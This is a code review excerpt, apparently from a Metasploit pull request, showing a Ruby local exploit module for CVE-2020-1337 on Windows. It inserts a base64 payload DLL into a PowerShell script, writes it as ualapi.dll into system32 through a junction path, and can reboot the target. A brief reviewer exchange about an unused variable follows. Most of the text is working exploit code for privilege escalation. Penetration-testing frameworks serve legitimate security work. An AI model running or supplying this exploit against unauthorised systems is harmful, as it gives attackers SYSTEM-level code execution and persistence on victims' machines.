modules/exploits/windows/local/cve_2020_1337_printerdemon.rb

```diff
@@ -0,0 +1,174 @@
+      OptBool.new('RESTART_TARGET',
+                  [false, 'Restart the target after exploit (you will lose your session until a second reboot).', false])
+    ])
+  end
+
+  def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload)
+    # Read in Generic Script
+    script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1')
+    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
+
+    # Replace Values in Generic Script
+    vprint_status('Replacing variables')
+    junction_filepath = "#{junction_path}\\#{destination_file}"
+    # The random string appears to be required when using the psh_exec
+    # It may be due to the way we break apart the script?
+    # I would not be upset to find the root cause and fix it.
+    script.gsub!('JUNCTION_FILEPATH', junction_filepath)
+    script.gsub!('PRINTER_NAME', printer_name)
+    script.gsub!('JUNCTION_PATH', junction_path)
+    script.gsub!('DESTINATION_PATH', destination_path)
+    script.gsub!('B64_PAYLOAD_DLL', b64_payload)
+
+    # Run Exploit Script
+    print_status("Running Exploit on #{sysinfo['Computer']}")
+    begin
+      #client.powershell.execute_string(code: script)
+      session.powershell.execute_string({code: script})
+    rescue Rex::TimeoutError => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+  end
+
+  def exploit
+    if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty?
+      win_dir = session.sys.config.getenv('windir')
+      destination_path = "#{win_dir}\\system32"
+    else
+      destination_path = datastore['DESTINATION_PATH']
+    end
+    if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty?
+      destination_file = 'ualapi.dll'
+    else
+      destination_file = datastore['DESTINATION_FILE']
+    end
+    if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty?
+      junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}"
+    else
+      junction_path = datastore['JUNCTION_PATH']
+    end
+    client.core.use("powershell") if not client.ext.aliases.include?("powershell")
+    printer_name = datastore['PRINTER_NAME']
+    payload_dll = generate_payload_dll
+
+    # Check target
+    vprint_status('Checking Target')
+    validate_active_host
+    validate_payload
+
+    # Run the exploit
+    output = cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll))
+    sleep(3) # make sure exploit is finished
+
+    # Reboot, if desired
+    if datastore['RESTART_TARGET']
+      sleep(10)
+      vprint_status("Rebooting #{sysinfo['Computer']}")
+      reboot_command = 'shutdown /r'
```

Comment:
I think this variable can be removed now, since it is not used anymore.
```suggestion
```

Reply:
Done